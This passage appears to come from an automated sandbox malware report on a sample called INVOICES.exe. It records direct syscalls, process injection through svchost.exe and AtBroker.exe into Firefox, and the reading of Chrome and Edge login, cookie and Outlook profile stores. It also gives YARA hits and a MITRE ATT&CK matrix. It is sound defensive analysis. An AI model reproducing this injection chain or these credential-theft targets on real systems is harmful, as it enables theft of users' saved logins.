                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007881D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0075A2A4 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtUnmapViewOfSection: Direct from: 0x77462D3C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: read write
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\AtBroker.exe | Thread register set: target process: 7636
                Source: C:\Windows\SysWOW64\AtBroker.exe | Thread APC queued: target process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                Source: C:\Users\user\Desktop\INVOICES.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BC1008
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00788A73 LogonUserW
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00733B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00734A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00794CFA mouse_event
                Source: C:\Users\user\Desktop\INVOICES.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICES.exe"
                Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007881D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00794A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: INVOICES.exe, XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: XORjEgwNIUb.exe, 00000004.00000002.3876881594.00000000011A1000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000000.1576010985.00000000011A0000.00000002.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877149720.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007587AB cpuid
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00765007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0077215F GetUserNameW
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007640BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00734AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\AtBroker.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: INVOICES.exe | Binary or memory string: WIN_81
                Source: INVOICES.exe | Binary or memory string: WIN_XP
                Source: INVOICES.exe | Binary or memory string: WIN_XPe
                Source: INVOICES.exe | Binary or memory string: WIN_VISTA
                Source: INVOICES.exe | Binary or memory string: WIN_7
                Source: INVOICES.exe | Binary or memory string: WIN_8
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007A6399 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket, 0_2_007A6399
                Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007A685D socket, WSAGetLastError, bind, WSAGetLastError, closesocket, 0_2_007A685D

                Mitre Att&ck Matrix

                One line per tactic; the numeric badges of the report are kept in front of the technique they precede.

                Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
                Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
                Initial Access: 2 Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
                Execution: 2 Native API | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
                Persistence: 1 DLL Side-Loading | 2 Valid Accounts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 Abuse Elevation Control Mechanism | 1 DLL Side-Loading | 2 Valid Accounts | 21 Access Token Manipulation | 412 Process Injection | Startup Items | Scheduled Task/Job | At | Cron
                Defense Evasion: 1 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 1 Abuse Elevation Control Mechanism | 31 Obfuscated Files or Information | 1 Software Packing | 1 DLL Side-Loading | 2 Valid Accounts | 2 Virtualization/Sandbox Evasion | 21 Access Token Manipulation | 412 Process Injection
                Credential Access: 1 OS Credential Dumping | 21 Input Capture | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
                Discovery: 2 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 116 System Information Discovery | 151 Security Software Discovery | 2 Virtualization/Sandbox Evasion | 3 Process Discovery | 11 Application Window Discovery | 1 System Owner/User Discovery | Network Service Discovery
                Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
                Collection: 1 Archive Collected Data | 1 Data from Local System | 1 Email Collection | 21 Input Capture | 3 Clipboard Data | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
